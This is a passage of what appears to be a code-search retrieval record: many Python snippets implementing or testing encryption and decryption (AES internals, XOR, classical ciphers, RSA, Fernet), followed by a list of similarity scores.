len(key) == 32:\n print('C.1 AES-128 (Nk=4, Nr=10)\\n')\n elif len(key) == 48:\n print('\\nC.2 AES-192 (Nk=6, Nr=12)\\n')\n else:\n print('\\nC.3 AES-256 (Nk=8, Nr=14)\\n')\n\n print('{:<19} {:}'.format('PLAINTEXT:', plaintext))\n print('{:<19} {:}\\n'.format('KEY:', key))\n\n print('CIPHER (ENCRYPT):')\n ciphertext = encrypt(plaintext, key, verbose=True)\n\n print('\\nINVERSE CIPHER (DECRYPT):')\n decrypt(ciphertext, key, verbose=True)", "def encrypt(self, key, plaintext):\n output = []\n padded_key = padd_key(key, plaintext)\n for i in range(len(plaintext)):\n enc_ascii = (ord(plaintext[i]) + ord(padded_key[i])) % 256\n output.append(chr(enc_ascii))\n return ''.join(output)", "def encrypt_vigenere(plaintext: str, keyword: str) -> str:", "def cipher(input_bytes, expanded_key, n_r):\n\n state = generate_initial_state(input_bytes)\n state = add_round_key(state, expanded_key, 0)\n\n # Apply rounds of operations as stated in AES standard\n for round_no in range(1, n_r):\n state = sub_bytes(state)\n state = shift_rows(state)\n state = mix_columns(state)\n state = add_round_key(state, expanded_key, round_no * 4 * 4)\n\n state = sub_bytes(state)\n state = shift_rows(state)\n state = add_round_key(state, expanded_key, n_r * 4 * 4)\n\n return state", "def unfunc(ciphertext, key):\n plaintext = xor(ciphertext, key)\n return plaintext", "def decrypt(key: str, encrypted: str) -> str:\n\n key_len = len(key)\n decrypted = ''\n\n # Go through the encrypted string in chunks the length of the key\n for i in range(0, len(encrypted), key_len):\n chunk = encrypted[i:i + key_len] # Pull out a chunk the size of the key\n\n # Apply the key to the chunk\n for j, c in enumerate(chunk):\n decrypted += chr(ord(key[j]) ^ ord(c))\n\n return decrypted", "def encipher(self):\n ciphertext = \"\"\n for pt, key_char in zip(self.text, self.key):\n char_index = self.char_block.alphabet.index(pt)\n ciphertext += self.char_block.rows[key_char][char_index]\n print(ciphertext)", "def expand_key(master_key):\n #s_box = bytes2matrix(s_box1)\n # Round constants https://en.wikipedia.org/wiki/AES_key_schedule#Round_constants\n r_con = (\n 0x00, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40,\n 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A,\n 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A,\n 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39,\n )\n\n # Initialize round keys with raw key material.\n key_columns = bytes2matrix(master_key, 4)\n #print(key_columns)\n iteration_size = len(master_key) // 4\n\n\n # Each iteration has exactly as many columns as the key material.\n columns_per_iteration = len(key_columns)\n i = 1\n while len(key_columns) < (N_ROUNDS + 1) * 4:\n # Copy previous word.\n word = list(key_columns[-1])\n\n # Perform schedule_core once every \"row\".\n if len(key_columns) % iteration_size == 0:\n # Circular shift.\n word.append(word.pop(0))\n # Map to S-BOX.\n word = [s_box[b-1] for b in word]\n\n # XOR with first byte of R-CON, since the others bytes of R-CON are 0.\n word[0] ^= r_con[i]\n i += 1\n elif len(master_key) == 32 and len(key_columns) % iteration_size == 4:\n # Run word through S-box in the fourth iteration when using a\n # 256-bit key.\n word = [s_box[b] for b in word]\n\n # XOR with equivalent word from previous iteration.\n word = bytes(i^j for i, j in zip(word, key_columns[-iteration_size]))\n key_columns.append(word)\n\n # Group key words in 4x4 byte matrices.\n return [key_columns[4*i : 4*(i+1)] for i in range(len(key_columns) // 4)]", "def corrupt(self, key):\n rand_bytes = random.getrandbits(8)\n byte_str 
= bytes([rand_bytes])\n self.client[key] = byte_str\n print('Corrupted %s in redis' % key)", "def decrypt(self,message, key):\n return self.translateMessage(message, key, \"decrypt\")", "def keyExp(key):\r\n def sub2Nib(b):\r\n \"\"\"Swap each nibble and substitute it using sBox\"\"\"\r\n return sBox[b >> 4] + (sBox[b & 0x0f] << 4)\r\n \r\n Rcon1, Rcon2 = 0b10000000, 0b00110000\r\n w[0] = (key & 0xff00) >> 8\r\n w[1] = key & 0x00ff\r\n w[2] = w[0] ^ Rcon1 ^ sub2Nib(w[1])\r\n w[3] = w[2] ^ w[1]\r\n w[4] = w[2] ^ Rcon2 ^ sub2Nib(w[3])\r\n w[5] = w[4] ^ w[3]", "def test_decrypt_key_incorrect(self):\n right_key = b'0' * 32\n wrong_key = b'1' * 32\n\n encrypted = encrypt('message', key=right_key)\n\n with pytest.raises(EncryptionError):\n decrypt(encrypted, key=wrong_key)", "def fernet_decript(key,message):\n\tf = Fernet(key)\n\treturn f.decrypt(message)", "def encrypt(data, key):\n data = six.ensure_binary(data)\n data = privy.hide(secret=data, password=key)\n data = six.ensure_text(data)\n return data", "def encrypt(\r\n key: bytes,\r\n plain_text: str,\r\n) -> bytes:\r\n block_size = 16\r\n plain_text = _pad(plain_text, block_size)\r\n iv = os.urandom(block_size)\r\n cipher = AES.new(key, AES.MODE_CBC, iv)\r\n cipher_text = cipher.encrypt(plain_text.encode())\r\n return iv + cipher_text", "def decrypt():\n plaintext = \"\"\n i = 0\n while i < len(ciphertext):\n if i%2==1:\n try:\n plaintext += key[ ciphertext[i-1]+ciphertext[i] ]\n except KeyError:\n plaintext += ciphertext[i-1]+ciphertext[i]\n i += 1\n return plaintext", "def _rsa_chopstring(message, key, function):\r\n \r\n msglen = len(message)\r\n \r\n # the size of the key in bits, minus one\r\n # so if the key was a 1024 bits, key.size() returns 1023\r\n nbits = key.size() \r\n \r\n # JAC: subtract a byte because we're going to add an extra char on the front\r\n # to properly handle leading \\000 bytes and ensure no loss of information.\r\n nbytes = int(nbits / 8) - 1\r\n blocks = int(msglen / nbytes)\r\n \r\n if msglen % nbytes > 0:\r\n blocks += 1\r\n\r\n # cypher will contain the integers returned from either\r\n # sign or encrypt.\r\n cypher = []\r\n \r\n for bindex in range(blocks):\r\n offset = bindex * nbytes\r\n block = message[offset:offset+nbytes]\r\n # key.encrypt will return a bytestring\r\n # IMPORTANT: The block is padded with a '\\x01' to ensure\r\n # that no information is lost when the key transforms the block\r\n # into its long representation prior to encryption. It is striped\r\n # off in _rsa_gluechops.\r\n # IMPORTANT: both rsa_encrypt and rsa_sign which use _rsa_chopstring\r\n # will pass the argument 'function' a reference to encrypt or\r\n # sign from the baseclass publickey.publickey, they will return\r\n # the cypher as a tuple, with the first element being the desired\r\n # integer result. 
\r\n # Example result : ( 1023422341232124123212 , )\r\n # IMPORTANT: the second arguement to function is ignored\r\n # by PyCrypto but required for different algorithms.\r\n cypher.append( function(chr(1) + block, '0')[0])\r\n\r\n return _rsa_picklechops(cypher)", "def on_encryptionKeyAgainEdit_textChanged(self, txt):\n self.__updateUI()", "def aes_decrypt(encrypted_data, key):\r\n cipher = aes_cipher_from_key(key)\r\n padded_data = cipher.decrypt(encrypted_data)\r\n return unpad(padded_data)", "def test_encryption(e, c):\n message = input(\"Enter word to encrypt: \")\n ciphered = ''\n\n for i in range(0, len(message)):\n ciphered = f'{ciphered}{chr(endecrypt(ord(message[i]), e, c))}'\n\n print(ciphered + ' is the ciphered text')\n d = key_cracker(e, c)\n print(\"Plain text is:\")\n for i in range(0, len(ciphered)):\n print(chr(endecrypt(ord(ciphered[i]), d, c)), end='')", "def text(message):\n room = session.get('room')\n key = os.urandom(32)\n iv = os.urandom(16)\n print(key,iv)\n\n print(key[:2],key[:4])\n print(len(key),len(iv))\n print(type(key))\n data = 'hello world 1234' # <- 16 bytes\n\n enc = aes_encrypt(key,data,iv)\n dec = aes_decrypt(key,enc,iv)\n\n print('data:',data)\n print('cipher:', enc)\n print('plain:',dec)\n test = os.urandom(2)\n print('key:', int.from_bytes(test, byteorder='little'))\n print('key', test)\n \n emit('enc_msg', {'key': key.hex(),\n 'cipher': enc.hex(),\n 'iv' : iv.hex(),\n }, room=room)\n emit('message', {'msg': session.get('name') + ':' + message['msg']}, room=room)", "def repeating_key_xor(msg_b, key_b):\n l = len(key_b)\n return bytes(key_b[n % l] ^ c_i for n, c_i in enumerate(msg_b))", "def test_kms_re_encrypt_call(self):\n b64_secret = base64.b64encode(self.secret)\n ef_utils.kms_re_encrypt(self.mock_kms, self.service, self.env, b64_secret)\n self.mock_kms.re_encrypt_called_once_with(CiphertextBlob=b64_secret)", "def _encrypt(self):\n self._outfile = os.path.join(self.dest, self.encrypted_file)\n self._infile = self.plain_file\n self._log.info(\"Encrypting '%s' to '%s'\", self.plain_file, self._outfile)\n with open(self.plain_file, \"rb\") as plain_file:\n openssl(\n \"enc\",\n \"-aes-256-cbc\",\n \"-pass\",\n \"file:{secret}\".format(secret=self.secret.keyfile),\n _in=plain_file,\n _out=self._outfile,\n )\n self._log.info(\"File '%s' encrypted to '%s'\", self.plain_file, self._outfile)\n return True", "def update_cipher(self, input):\n\n if self.cipher is None:\n \"\"\" We directly put the input in the lsfr\n Generally, at the beginning, the input correspond\n to the xoring of the uid, key and nonce Nt \"\"\"\n self.cipher = input\n else:\n \"\"\" We update the state of the lfsr by\n xoring the lfsr with the input. For the moment,\n the feedback bits generated from g(x) are \n not taken in account. But it should be at the \n initialization step only ... 
\"\"\" \n self.cipher = self.cipher ^ input", "def encrypt_aes(msg, key, iv):\r\n #start timer\r\n start = timeit.default_timer()\r\n\r\n #converting key to bytes from hex\r\n key = bytes.fromhex(key)\r\n msg = pad(msg)\r\n obj = AES.new(key, AES.MODE_CBC, iv)\r\n ciphertxt = obj.encrypt(msg)#ciphertxt will be in 'bytes'\r\n\r\n #converting ciphertxt into hexadecimal\r\n ciphertxt = ciphertxt.hex()\r\n\r\n print(\"Ciper is: \",ciphertxt)\r\n\r\n #stop timer\r\n stop = timeit.default_timer()\r\n print('Encryption Running Time: ', stop-start)\r\n \r\n return ciphertxt", "def encrypt(self, message):\n # message = message.upper().split()\n # message = \"\".join(message)\n message = message.upper()\n message_list = []\n for ch in message:\n message_list.append(self.main_dict[ch][0])\n\n # Generate a random key\n random_otp = [random.choice(self.alphabet_list) for _ in range(len(message))]\n print(\"Your OTP is: \" + str(\"\".join(random_otp)))\n print(\"Use the OTP to unlock the message.\")\n\n # Convert Random key to integers\n for i, item in enumerate(random_otp):\n random_otp[i] = self.main_dict[item][0]\n\n # Do the math with Random Key and the message\n math_list = []\n for i, item in enumerate(message_list):\n try:\n result = message_list[i] + random_otp[i]\n math_list.append(result)\n except:\n print(\"The message and OTP does not have the same length\")\n continue\n\n # Logic to do mod27\n for i, item in enumerate(math_list):\n for key, value in self.main_dict.items():\n if item > 26:\n if value[1] == item:\n math_list[i] = key\n else:\n if value[0] == item:\n math_list[i] = key\n\n # Algorithm for 5 block characters\n padding = input(\"Would you like to use block 5 characters? y/n \")\n if padding == \"y\":\n math_list = self.salt_with_random(math_list)\n return \" \".join(math_list)\n else:\n math_list = \"\".join(math_list)\n return math_list", "def encrypt(input_bytes, expanded_key, n_r):\n\n # Add ZeroLength padding if necessary\n pad = 16 - (len(input_bytes) % 16)\n input_bytes.extend([0] * pad)\n input_bytes[-1] = pad\n\n # Encrypt each block of input plaintext\n output_bytes = []\n for i in range(0, len(input_bytes), 16):\n # Cipher block of 16 bytes\n partial = cipher(input_bytes[i:i+16], expanded_key, n_r)\n\n # Re-group bytes in column-first order\n for col in range(0, 4):\n for row in range(0, 4):\n output_bytes.append(partial[row][col])\n\n return output_bytes", "def decipher2(s, key): # s = message\n return decipher_raw2(s, key).rstrip(bytes('\\x00'.encode('utf-8')))", "def encrypt(self, message):\n return self._transform(message, self._encoder)", "def encrypt(self, message):\n return self._transform(message, self._encoder)", "def revert(self, record, new_password):\n if self.old_key_deleted:\n if self.aws_sync_profile:\n if self.sync_with_creds_file():\n logging.info(\n f'New key id \"{self.new_key_id}\" was updated in profile \"{self.aws_sync_profile}\"'\n ' of AWS credentials file, but failed to update in Keeper record.'\n )\n else:\n logging.info(\n f'New key id {self.new_key_id} failed to update in profile \"{self.aws_sync_profile}\"'\n ' of AWS credentials file, and also failed to update in Keeper record.'\n )\n return False\n else:\n self.delete_key(new_key=True)", "def encrypt(content, key):\n\ttry:\n\t\tfrom Cryptodome.Cipher import AES\n\t\tfrom Cryptodome import Random\n\texcept ImportError:\n\t\tfrom Crypto.Cipher import AES\n\t\tfrom Crypto import Random\n\n\tif not isPython2():\n\t\tif isString(content):\n\t\t\tcontent = content.encode(\"latin-1\")\n\t\tif 
isString(key):\n\t\t\tkey = key.encode(\"latin-1\")\n\n\tcontent = pad(content)\n\tiv = Random.new().read(AES.block_size)\n\tcipher = AES.new(key, AES.MODE_CBC, iv)\n\tresult = iv + cipher.encrypt(content)\n\treturn result", "def rail_fence_encrypt(string, key):\n try:\n cols_size = len(string)\n arr_of_words = [[0 for i in range(cols_size)] for j in range(key)]\n pos = 0\n direction = 1\n for j in range(0, cols_size):\n # direction variable sets the moving direction\n arr_of_words[pos][j] = string[j]\n pos += direction\n if pos == 0 or pos == key-1:\n direction *= (-1)\n\n str_to_return = \"\" # concat the new string\n for i in range(key):\n for j in range(cols_size):\n if arr_of_words[i][j] != 0:\n str_to_return += arr_of_words[i][j]\n return str_to_return\n except (ValueError, IndexError) as ex:\n print(EXCEPTION_MESSAGE, ex)", "def encrypt():\n\tnull = 0", "def encipher(self,string): \n string = self.remove_punctuation(string)\n ret = ''\n for (i,c) in enumerate(string):\n if i<len(self.key): offset = self.a2i(self.key[i])\n else: offset = self.a2i(string[i-len(self.key)]) \n ret += self.i2a(self.a2i(c)+offset)\n return ret", "def aes_ctr_encrypt(self, key: bytes, plain_data: bytes, nonce: bytes) -> bytes:\n cipher = Cipher(algorithms.AES(key), modes.CTR(nonce), default_backend())\n enc = cipher.encryptor()\n return enc.update(plain_data) + enc.finalize()", "def xor_decrypt(ciphertext, key):\n\n\tdecrypted_char = ''\n\tdecrypted_str = ''\n\n\tfor char in ciphertext:\n\t\tdecrypted_char = chr(char ^ key)\n\t\tdecrypted_str += decrypted_char\n\n\treturn decrypted_str", "def aes_key_wrap(self, kek: bytes, key_to_wrap: bytes) -> bytes:\n return keywrap.aes_key_wrap(kek, key_to_wrap, default_backend())", "def encrypt_message(message,public_key,symetric_key):\n\tif message != None:\n\t\tnonce = os.urandom(12)\n\t\tmessage = AESCCM(symetric_key).encrypt(nonce,message.encode(\"iso-8859-1\"),None)\n\t\tnonce, *_ = encrypt(public_key,nonce)\n\t\tmessage ={'nonce' : nonce.decode(\"iso-8859-1\"),'message':message.decode(\"iso-8859-1\")}\n\n\treturn message", "def generate_encrypted_key(key, encryption_key):\n pub_enc_key = RSA.importKey(encryption_key)\n # RSA encryption protocol according to PKCS#1 OAEP\n cipher = PKCS1_OAEP.new(pub_enc_key)\n return cipher.encrypt(key)", "def encrypt(self, message):\n\n IV = Random.new().read(self.BLOCK_SIZE)\n aes = AES.new(self.key, AES.MODE_CBC, IV)\n return base64.b64encode(IV + aes.encrypt(self._pad(message)))", "def encrypt(self, plaintext):\n return self._transform(plaintext, self._forward)" ]
[ "0.7298857", "0.7298796", "0.71268785", "0.66500294", "0.6324676", "0.62568414", "0.6190534", "0.6128457", "0.61111814", "0.6098401", "0.60541093", "0.59321904", "0.5931756", "0.5884302", "0.587639", "0.58716655", "0.5832455", "0.58202076", "0.5819175", "0.5817855", "0.58072025", "0.5782812", "0.5781394", "0.57752514", "0.5763925", "0.57580334", "0.5740395", "0.5723917", "0.56983775", "0.5694362", "0.56916404", "0.5686319", "0.56828284", "0.5624081", "0.56213146", "0.56144273", "0.56143916", "0.561135", "0.5594446", "0.5589564", "0.5575889", "0.5571132", "0.5553264", "0.5542429", "0.5533341", "0.5506831", "0.54948634", "0.54858255", "0.5485778", "0.54724866", "0.54638803", "0.5452072", "0.5444379", "0.54362196", "0.5435763", "0.54349726", "0.54295075", "0.5421083", "0.54138976", "0.5411106", "0.5398004", "0.53975874", "0.53947574", "0.53947145", "0.53823197", "0.5380209", "0.5374385", "0.5373131", "0.53637534", "0.5356349", "0.53516275", "0.5345637", "0.5332534", "0.5322125", "0.5310796", "0.5310576", "0.52931243", "0.52910525", "0.5290315", "0.5289933", "0.5289342", "0.5288645", "0.5283779", "0.52828836", "0.52754337", "0.52702767", "0.5270133", "0.5270133", "0.5261072", "0.5260378", "0.52579516", "0.5256385", "0.52563167", "0.525532", "0.523766", "0.5235122", "0.5222716", "0.5221709", "0.522149", "0.5218166" ]
0.7975824
0
It raises an error when trying to rekey a non-encrypted value.
def test_rekey_non_encrypted(self):
    with pytest.raises(EncryptionError):
        rekey('message', old_key=b'0' * 32, new_key=b'1' * 32)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_rekey_key_format(self):\n old_key = b'0' * 32\n encrypted = encrypt('message', key=old_key)\n\n with pytest.raises(EncryptionError):\n rekey(encrypted, old_key=old_key, new_key=b'1' * 31)", "def test_encrypt_key_invalid(self):\n with pytest.raises(EncryptionError):\n encrypt('message', key=b'0' * 31)", "def test_decrypt_key_incorrect(self):\n right_key = b'0' * 32\n wrong_key = b'1' * 32\n\n encrypted = encrypt('message', key=right_key)\n\n with pytest.raises(EncryptionError):\n decrypt(encrypted, key=wrong_key)", "def test_rekey(self):\n old_key = b'0' * 32\n new_key = b'1' * 32\n\n old_encrypted = encrypt('message', key=old_key)\n new_encrypted = rekey(old_encrypted, old_key=old_key, new_key=new_key)\n\n assert decrypt(new_encrypted, key=new_key) == 'message'", "def test_decrypt_key_invalid(self):\n encrypted = encrypt('message', key=b'0' * 32)\n\n with pytest.raises(EncryptionError):\n decrypt(encrypted, key=b'0' * 31)", "def test_rekey_defaults(self, settings):\n old_key = b'0' * 32\n new_key = b'1' * 32\n\n settings.CHITON_ENCRYPTION_KEY = new_key\n settings.CHITON_PREVIOUS_ENCRYPTION_KEY = old_key\n\n encrypted = encrypt('message', key=old_key)\n rekeyed = rekey(encrypted)\n\n assert decrypt(rekeyed) == 'message'", "def corrupt(self, key):\n rand_bytes = random.getrandbits(8)\n byte_str = bytes([rand_bytes])\n self.client[key] = byte_str\n print('Corrupted %s in redis' % key)", "def test_invalid_keys(self):\n\n\t\ttry:\n\t\t\tyield self.conn.set(\"this has spaces\", 1)\n\t\texcept ValueError:\n\t\t\tpass\n\t\telse:\n\t\t\tself.fail(\"key with spaces did not raise ValueError\")\n\n\t\ttry:\n\t\t\tyield self.conn.set(\"\\x10control\\x02characters\\x11\", 1)\n\t\texcept ValueError:\n\t\t\tpass\n\t\telse:\n\t\t\tself.fail(\"key with control characters did not raise ValueError\")\n\n\t\ttry:\n\t\t\tyield self.conn.set(\"a\" * (SERVER_MAX_KEY_LENGTH + 1), 1)\n\t\texcept ValueError:\n\t\t\tpass\n\t\telse:\n\t\t\tself.fail(\"long key did not raise ValueError\")\n\n\t\ttry:\n\t\t\tyield self.conn.set(u\"unicode\\u4f1a\", 1)\n\t\texcept TypeError:\n\t\t\tpass\n\t\telse:\n\t\t\tself.fail(\"unicode key did not raise ValueError\")", "def testKeyMismatch(self):\n encrypted_data = self.encrypt_wrapper.read(1024 * 1024 * 100)\n\n wrong_key = crypto.RSAPrivateKey().GenerateKey()\n decrypt_wrapper = uploads.DecryptStream(\n readers_private_key=self.readers_private_key,\n writers_public_key=wrong_key.GetPublicKey(),\n outfd=self.outfd)\n\n # We should know after very few bytes that the key is wrong. The\n # first encrypted chunk is the serialized signature which is 518\n # bytes in the test. Adding crypto headers gives a chunk size of\n # 570. 
After 600 bytes we should definitely bail out.\n with self.assertRaises(crypto.VerificationError):\n decrypt_wrapper.write(encrypted_data[:600])", "def test_encrypt_key(self):\n encrypted = encrypt('message', key=b'0' * 32)\n\n assert encrypted\n assert encrypted != 'message'", "def test_wrong_key(self):\n with pytest.raises(FinderInsideProException) as ex:\n FinderInsidePro(\"\")\n assert FinderInsideProException.EXCEPTION_TEXT_KEY_NOT_SET in str(ex)\n assert ex.value.extype == FinderInsideProException.TYPE_KEY_IS_WRONG\n\n with pytest.raises(FinderInsideProException) as ex:\n FinderInsidePro('aaa')\n assert FinderInsideProException.EXCEPTION_TEXT_WRONG_KEY in str(ex)\n assert ex.value.extype == FinderInsideProException.TYPE_KEY_IS_WRONG", "def test_decrypt_key_default(self, settings):\n settings.CHITON_ENCRYPTION_KEY = b'0' * 32\n\n encrypted = encrypt('message')\n assert decrypt(encrypted) == 'message'\n\n settings.CHITON_ENCRYPTION_KEY = b'1' * 32\n with pytest.raises(EncryptionError):\n decrypt(encrypted)", "def test_kms_re_encrypt_fails_client_error(self):\n self.mock_kms.re_encrypt.side_effect = self.client_error\n b64_secret = base64.b64encode(self.secret)\n with self.assertRaises(SystemExit):\n ef_utils.kms_re_encrypt(self.mock_kms, self.service, self.env, b64_secret)", "def test_decrypt_key(self):\n key = b'0' * 32\n\n encrypted = encrypt('message', key=key)\n assert decrypt(encrypted, key=key) == 'message'", "def gpgkey_error(self, repo_id, error):\n self.send(repo_id, 'gpgkey_error', error)", "def test_kms_re_encrypt_fails_without_b64_secret(self):\n with self.assertRaises(SystemExit):\n ef_utils.kms_re_encrypt(self.mock_kms, self.service, self.env, self.secret)", "def test_set_key():\n\n assert symmetric.set_key(\"test\") == \"test\"", "def test03Expire(self):\n s = utils.FastStore(max_size=100)\n key = \"test1\"\n s.Put(key, 1)\n\n # This should not raise\n self.assertEqual(s.Get(key), 1)\n s.ExpireObject(key)\n\n self.assertRaises(KeyError, s.Get, key)", "def test_encrypt_key_default(self, settings):\n settings.CHITON_ENCRYPTION_KEY = None\n\n with pytest.raises(EncryptionError):\n encrypt('message')", "def test_decrypt_format(self):\n with pytest.raises(EncryptionError):\n decrypt('message')", "def keychange(self):\n # if response.json()['error']['errors'][0]['reason']=='quotaExceeded':\n self.keyindex += 1\n if self.keyindex == len(self.keylist):\n self.keyindex = 0\n print('Keylist length reached')\n print('Changinf Key..')\n key = self.keylist[self.keyindex]\n print(\"Quota Exceeded\", self.keyindex)\n return key", "def _check_key(self, key):\n raise NotImplementedError", "def test_keyerror(self):\n try:\n self.db['foo']\n except KeyError, e:\n assert \"no key 'foo' in database <SequenceFileDB\" in str(e), str(e)", "def test_set_invalid_key(test_file):\n md = OSXMetaData(test_file.name)\n with pytest.raises(KeyError):\n md[\"invalid_key\"] = \"value\"", "def validate_key_throw(*args):\n validation_result = validate_key(*args)\n if not validation_result:\n raise ValueError(str(validation_result))\n return validation_result", "def test_set_redis_no_val():\n with pytest.raises(TypeError):\n redis_data.set_redis_data('key')", "def test_wrong_course_key(self):\n def mock_from_string(*args, **kwargs):\n \"\"\"Mocked function to always raise an exception\"\"\"\n raise InvalidKeyError('foo', 'bar')\n\n self.client.login(username=self.student.username, password=self.password)\n with patch('opaque_keys.edx.keys.CourseKey.from_string', side_effect=mock_from_string):\n resp = 
self.client.get(self.get_url(self.student.username))\n\n assert resp.status_code == status.HTTP_404_NOT_FOUND\n assert 'error_code' in resp.data\n assert resp.data['error_code'] == 'invalid_course_key'", "def test_encrypt_no_key_id(self):\n encryptor = self.test_init()\n encryptor.key_id = None\n\n with self.assertRaises(IceItException):\n encryptor.encrypt('blah', 'blah-again')", "def test_setter_invalid_key(self):\n root = netapp_api.NaElement('root')\n try:\n root[None] = 'value'\n except Exception as e:\n if not isinstance(e, KeyError):\n self.fail(_('Error not a KeyError.'))", "def test_setter_invalid_key(self):\n root = netapp_api.NaElement('root')\n try:\n root[None] = 'value'\n except Exception as e:\n if not isinstance(e, KeyError):\n self.fail(_('Error not a KeyError.'))", "def key(self, value=None):\n if self.crypt_method == 'C':\n key_type = \"number\"\n else:\n key_type = \"string\"\n\n input_message = f\"Please enter a {key_type} as a \" \\\n f\"{self.crypt_type}ion key\\n>> \"\n if value is None:\n key = input(input_message)\n else:\n key = value\n\n is_valid_key, key = Check.is_valid_key(key, self.crypt_method)\n if is_valid_key:\n self._key = key\n else:\n raise ValueError(f\"Key{key} is invalid\")", "def revert(self, record, new_password):\n if self.old_key_deleted:\n if self.aws_sync_profile:\n if self.sync_with_creds_file():\n logging.info(\n f'New key id \"{self.new_key_id}\" was updated in profile \"{self.aws_sync_profile}\"'\n ' of AWS credentials file, but failed to update in Keeper record.'\n )\n else:\n logging.info(\n f'New key id {self.new_key_id} failed to update in profile \"{self.aws_sync_profile}\"'\n ' of AWS credentials file, and also failed to update in Keeper record.'\n )\n return False\n else:\n self.delete_key(new_key=True)", "def _KeyMissing(side):\n return 'Key missing from %s' % side", "def test_keys_failure(self):\n storage = Storage()\n storage._keys_dict = {'1': 'one',\n 'abc': '1'}\n self.assertRaises(StoragePatternError, storage.keys, 'ab[cd')", "def test01StoreExpiration(self):\n s = utils.FastStore(max_size=5)\n keys = []\n for i in range(0, 100):\n keys.append(s.Put(i, i))\n\n # This should not raise\n s.Get(keys[-1])\n\n # This should raise though\n self.assertRaises(KeyError, s.Get, keys[0])", "def test_blob_key():\n\tbackup_and_restore(\n\t\tlambda context: put_keys(lib.SET, BLOB_KEYS, \"foobar\", False),\n\t\tNone,\n\t\tlambda context: check_keys(lib.SET, BLOB_KEYS, \"foobar\", False)\n\t)", "def test_getObjectByKey_raises_KeyError(self):\n try:\n self.tile_bucket.getObjectByKey('foo_key')\n except KeyError:\n return\n assert(False)", "def test_neg_exists_key_invalid_data(self, key, ex_code, ex_msg):\n with pytest.raises(e.ParamError):\n key, _ = self.as_connection.exists(key)", "def test_create_key():\n\n assert symmetric.create_key() != \"\"", "def _newKey(self, key):\n pass", "def test_other_user_kvs_set_failure(self):\r\n with self.assertRaises(AssertionError):\r\n self.kvs.set(self.other_key_factory(self.existing_field_name), \"new_value\")", "def test_getKey_nokey(self):\n filename = os.path.join(os.getcwd(), 'sekrit')\n key = crypto.getKey(filename)\n self.failUnlessIsInstance(key, basestring,\n \"key isn't a string! 
type=%r\" % type(key))", "def testTokenToDataWithBadKey(self):\n key = createKey()\n data = {u'user': u'aliafshar'}\n token = dataToToken(key, data)\n self.assertRaises(ValueError, tokenToData, createKey(), token=token)", "def testBadKeyToToken(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='hey')", "def password_error(self, msg):\n raise NotImplementedError('password_error')", "def test_corrupted_login_key():\n buf = open_bmylogin_cnf(LOGIN_PATH_FILE)\n\n # Skip past the unused bytes\n buf.seek(4)\n\n # Write null bytes over half the login key\n buf.write(b'\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0')\n\n buf.seek(0)\n mylogin_cnf = read_and_decrypt_mylogin_cnf(buf)\n\n assert mylogin_cnf is None", "def test_encryption_public_key_not_given(self) -> None:\n\n given = \"Hello, World!\"\n\n encryptor = DataEncryption()\n\n self.assertRaises(ValueError, lambda: encryptor.encrypt_data(given))", "def DeriveKey(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def get_key(self, key_value):\n # Storing the correct key value back to the self.key attributes.\n self.key=key_value\n self.cryptor=Fernet(self.key)", "def test_plaintext_and_anoncrypt_raises_error(alice):\n with pytest.raises(ValueError):\n alice.pack({\"test\": \"test\"}, plaintext=True, anoncrypt=True)", "def test_integer_key():\n\tbackup_and_restore(\n\t\tlambda context: put_keys(lib.SET, INTEGER_KEYS, \"foobar\", False),\n\t\tNone,\n\t\tlambda context: check_keys(lib.SET, INTEGER_KEYS, \"foobar\", False)\n\t)", "def test_decryption_private_key_not_given(self) -> None:\n\n given = \"Hello, World!\"\n\n encryptor = DataEncryption()\n\n self.assertRaises(ValueError, lambda: encryptor.decrypt_data(given))", "def avoid_keyerror(dictionary, key):\n\t\"*** YOUR CODE HERE ***\"\n\ttry:\n\t\tvalue = dictionary[key]\n\texcept KeyError:\n\t\tprint('Avoid Exception')\n\t\tdictionary[key] = value = 'no value'\n\tfinally:\n\t\treturn value", "def test_config_key_error():\n c = core.Config()\n\n with pytest.raises(KeyError):\n c['doesNotExist']", "def test_use_privatekey_wrong_key(self, ctx_or_conn):\n key = PKey()\n key.generate_key(TYPE_RSA, 1024)\n ctx_or_conn.use_certificate(\n load_certificate(FILETYPE_PEM, root_cert_pem)\n )\n with pytest.raises(Error):\n ctx_or_conn.use_privatekey(key)", "def _invalid_transport_key_id():\n pecan.abort(404, u._('Not Found. 
Provided transport key id is invalid.'))", "def test_traversal_invalid_string(traversal_test_trie):\n with pytest.raises(KeyError):\n gen = traversal_test_trie.traversal('invalid')\n next(gen)", "def fail(team, chal, request):\n provided_key = request.form['key'].strip()\n wrong = WrongKeys(teamid=team.id, chalid=chal.id, ip=utils.get_ip(request), flag=provided_key)\n db.session.add(wrong)\n db.session.commit()\n db.session.close()", "def recover(self, error):\n raise error", "def isValidKey(key):\n return True", "def test_encrypt_nonce(self):\n key = b'0' * 32\n message = 'message'\n\n assert encrypt(message, key=key) != encrypt(message, key=key)", "def test_get_write_fail(self):\n os.chmod(self.test_key_filename, 0400)\n\n self.assertRaises(IOError, self.key_gen.get)", "def test_integer_key_stored():\n\tbackup_and_restore(\n\t\tlambda context: put_keys(lib.SET, INTEGER_KEYS, \"foobar\", True),\n\t\tNone,\n\t\tlambda context: check_keys(lib.SET, INTEGER_KEYS, \"foobar\", True)\n\t)", "def test_set_key_too_long(self):\n with RandomKeyTmpFile(128) as fname:\n command_line = self._MENU + [self._KEYNAME, \"--keyfile-path\", fname]\n self.check_error(StratisCliEngineError, command_line, _ERROR)", "def fail(self, key, **kwargs):\n return fail(self, key, **kwargs)", "def test_string_key():\n\tbackup_and_restore(\n\t\tlambda context: put_keys(lib.SET, STRING_KEYS, \"foobar\", False),\n\t\tNone,\n\t\tlambda context: check_keys(lib.SET, STRING_KEYS, \"foobar\", False)\n\t)", "def test_incorrect_decrypt_message(cipher):\n with pytest.raises(AssertionError):\n decrypted = cipher.decrypt('U6DQfhE17od2Qe4TPZFJHn3LOMkpPDqip77e4b5uv7s=')\n assert decrypted == 